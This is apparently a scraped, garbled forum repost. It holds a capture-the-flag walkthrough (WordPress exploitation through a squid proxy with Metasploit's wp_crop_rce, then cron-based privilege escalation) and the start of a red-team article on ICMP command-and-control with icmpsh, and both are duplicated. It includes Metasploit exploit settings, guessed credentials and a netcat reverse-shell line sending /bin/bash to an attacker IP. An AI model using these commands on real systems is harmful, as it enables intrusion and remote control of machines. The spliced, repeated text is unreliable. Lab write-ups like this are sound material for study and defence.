here.
Security Level: Intermediate
Penetrating Methodology:
Scanning
[size=small]netdiscover
1
netdiscover[/size]
We used Nmap for port enumeration and found that only port 8080 is open on which a squid proxy is running, which means our target machine is a proxy server.
Enumeration
Since the target machine was behind the proxy so we may not get desired results from any direct enumeration technique. We tried using dirb Dirbuster with proxy and got one directory named called /server-status.
To set up a proxy in Dirbuster go to Advance options then click on Http Options and check the Run through a Proxy box and enter the host IP and port number.
we got http 200 Ok response for /server-status from its result.
So to access the URL 127.0.0.1/server-status in the browser we first set up our proxy using the foxyproxy or directly in the settings of the browser.
We have done here using the foxyproxy plugin.
Then we accessed the URL and found that there is one more port open on the target machine i.e 1337.
After accessing the URL 127.0.0.1:1337
So we again used Dirbuster for brute force and got a directory named /wordpress.
This time I found the directory for /wordpress.
After accessing the URL we got a WordPress site. So we used WPScan with proxy to find any vulnerability on the just found WordPress site.
[size=small]wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.1.104:8080 -e u
1
wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.1.104:8080 -e u[/size]
In the results of the scan we found that the site has two wp admins root & Jerome.
Also, we got to know that there is a code execution vulnerability present on the website for which the exploit is already present in the Metasploit.
Exploitation:
We used the same exploit in msf which was given by our WPScan results.
Since this was an authenticated code execution exploit which means we have to enter the credentials, we put in the jerome jerome as username and password and it came out to be correct and we got a meterpreter shell.
[size=small]use exploit/multi/http/wp_crop_rce
set rhosts 127.0.0.1
set proxies http:192.168.1.104:8080
set username jerome
set password jerome
set targeturi /wordpress
set rport 1337
set ReverseAllowProxy true
set lhost 192.168.1.105
exploit
1
2
3
4
5
6
7
8
9
10
use exploit/multi/http/wp_crop_rce
set rhosts 127.0.0.1
set proxies http:192.168.1.104:8080
set username jerome
set password jerome
set targeturi /wordpress
set rport 1337
set ReverseAllowProxy true
set lhost 192.168.1.105
exploit[/size]
We looked into the /home/Jerome directory and got our first flag.
Now it was time to get to the root shell and get out the final flag. We looked here and there to get something useful and in the process, we checked into the crontab file and found that there is one script simulate.sh scheduled after every reboot.
The simulate.sh file is tasked to run three commands cd, ls and sleep.
Privilege Escalation:
To elevate to the root shell what we did is we edited the ls
[size=small]shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
echo "nc -e /bin/bash 192.168.1.105 1234" >> ls
chmod 777 ls
1
2
3
4
shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
echo "nc -e /bin/bash 192.168.1.105 1234" >> ls
chmod 777 ls[/size]
On our kali, we started the nc listener on the same port and after rebooting the target system we got the root shell and finally the root flag.
In this article, you will learn about the RED TEAM Operation for data exfiltration via ICMP-C2 and ICMP Tunneling because both approaches are useful in order to circumvent firewall rules because they generate unsound traffic in the network.
Table of Content
Brief Summary on working of ICMP Protocol
Command & Control via ICMP Protocol
ICMP packet at Network layer
IP header
ICMP header
ICMP payload size
20 bytes
8 bytes
20 + 8 + 1472 = 1500
A ping command sends an ICMP echo request to the target host. The target host responds with an echo Reply which means the target host is alive.
Read more from here
Command & Control via ICMP Protocol
In our many publications, we had discussed over C2-channel who is additionally acknowledged as command & control so you may find out it here. Although you are pleased to learn how to use ICMP protocol as a command & control channel between this thesis.
A cyber-war is strolling of Intruder and Security researcher, therefore, we need to hold partial backup plan. As we all know the company has grown to be smarter, they understand such as type concerning attack is being observed after achieving TCP reverse connection of the machine.
Thus we come up with ICMP secret shell which and use icmpsh as command & control tool.
REQUIREMENT
icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python. The main advantage over the other similar open-source tools is that it does not require administrative privileges to run onto the target machine.
The tool is clean, easy and portable. The slave (client) runs on the target Windows machine, it is written in C and works on Windows only whereas the master (server) can run on any platform on the attacker machine as it has been implemented in C and Perl by Nico Leidecker and later it also gets ported into Python too.
It is very easy to install and use as c2-channel. Turn the attacker machine for icmpsh and download icmpsh from Github.
[size=small]git clone https://github.com/inquisb/icmpsh.git[/SIZE]
1
git clone https://github.com/inquisb/icmpsh.git[/SIZE][/size]
Security Level: Intermediate
Penetrating Methodology:
- Scanning
- Netdiscover
- NMAP
- Enumeration
- Dirbuster
- WPScan
- Exploitation
- Metasploit
- Privilege Escalation
- Exploiting Crontab
Scanning
[size=small]netdiscover
1
netdiscover[/size]
We used Nmap for port enumeration and found that only port 8080 is open on which a squid proxy is running, which means our target machine is a proxy server.
Enumeration
Since the target machine was behind the proxy so we may not get desired results from any direct enumeration technique. We tried using dirb Dirbuster with proxy and got one directory named called /server-status.
To set up a proxy in Dirbuster go to Advance options then click on Http Options and check the Run through a Proxy box and enter the host IP and port number.
we got http 200 Ok response for /server-status from its result.
So to access the URL 127.0.0.1/server-status in the browser we first set up our proxy using the foxyproxy or directly in the settings of the browser.
We have done here using the foxyproxy plugin.
Then we accessed the URL and found that there is one more port open on the target machine i.e 1337.
After accessing the URL 127.0.0.1:1337
So we again used Dirbuster for brute force and got a directory named /wordpress.
This time I found the directory for /wordpress.
After accessing the URL we got a WordPress site. So we used WPScan with proxy to find any vulnerability on the just found WordPress site.
[size=small]wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.1.104:8080 -e u
1
wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.1.104:8080 -e u[/size]
In the results of the scan we found that the site has two wp admins root & Jerome.
Also, we got to know that there is a code execution vulnerability present on the website for which the exploit is already present in the Metasploit.
Exploitation:
We used the same exploit in msf which was given by our WPScan results.
Since this was an authenticated code execution exploit which means we have to enter the credentials, we put in the jerome jerome as username and password and it came out to be correct and we got a meterpreter shell.
[size=small]use exploit/multi/http/wp_crop_rce
set rhosts 127.0.0.1
set proxies http:192.168.1.104:8080
set username jerome
set password jerome
set targeturi /wordpress
set rport 1337
set ReverseAllowProxy true
set lhost 192.168.1.105
exploit
1
2
3
4
5
6
7
8
9
10
use exploit/multi/http/wp_crop_rce
set rhosts 127.0.0.1
set proxies http:192.168.1.104:8080
set username jerome
set password jerome
set targeturi /wordpress
set rport 1337
set ReverseAllowProxy true
set lhost 192.168.1.105
exploit[/size]
We looked into the /home/Jerome directory and got our first flag.
Now it was time to get to the root shell and get out the final flag. We looked here and there to get something useful and in the process, we checked into the crontab file and found that there is one script simulate.sh scheduled after every reboot.
The simulate.sh file is tasked to run three commands cd, ls and sleep.
Privilege Escalation:
To elevate to the root shell what we did is we edited the ls
[size=small]shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
echo "nc -e /bin/bash 192.168.1.105 1234" >> ls
chmod 777 ls
1
2
3
4
shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
echo "nc -e /bin/bash 192.168.1.105 1234" >> ls
chmod 777 ls[/size]
On our kali, we started the nc listener on the same port and after rebooting the target system we got the root shell and finally the root flag.
In this article, you will learn about the RED TEAM Operation for data exfiltration via ICMP-C2 and ICMP Tunneling because both approaches are useful in order to circumvent firewall rules because they generate unsound traffic in the network.
Table of Content
Brief Summary on working of ICMP Protocol
Command & Control via ICMP Protocol
- Requirement
- icmpsh: C2-channel & Its Installation
- Run icmpsh as Master
- Run icmpsh as Slave
- Requirement
- Configure ICMP over Server Machine (Target)
- Configure ICMP tunnel over Client Machine (Intruder)
- Connect SSH Over ICMP
ICMP packet at Network layer
IP header
ICMP header
ICMP payload size
20 bytes
8 bytes
20 + 8 + 1472 = 1500
A ping command sends an ICMP echo request to the target host. The target host responds with an echo Reply which means the target host is alive.
Read more from here
Command & Control via ICMP Protocol
In our many publications, we had discussed over C2-channel who is additionally acknowledged as command & control so you may find out it here. Although you are pleased to learn how to use ICMP protocol as a command & control channel between this thesis.
A cyber-war is strolling of Intruder and Security researcher, therefore, we need to hold partial backup plan. As we all know the company has grown to be smarter, they understand such as type concerning attack is being observed after achieving TCP reverse connection of the machine.
Thus we come up with ICMP secret shell which and use icmpsh as command & control tool.
REQUIREMENT
- Attacker Machine or C2-channel:192.168.1.108 (Kali Linux)
- Host machine:192.168.1.106 (Windows 10)
icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python. The main advantage over the other similar open-source tools is that it does not require administrative privileges to run onto the target machine.
The tool is clean, easy and portable. The slave (client) runs on the target Windows machine, it is written in C and works on Windows only whereas the master (server) can run on any platform on the attacker machine as it has been implemented in C and Perl by Nico Leidecker and later it also gets ported into Python too.
It is very easy to install and use as c2-channel. Turn the attacker machine for icmpsh and download icmpsh from Github.
[size=small]git clone https://github.com/inquisb/icmpsh.git[/SIZE]
1
git clone https://github.com/inquisb/icmpsh.git[/SIZE][/size]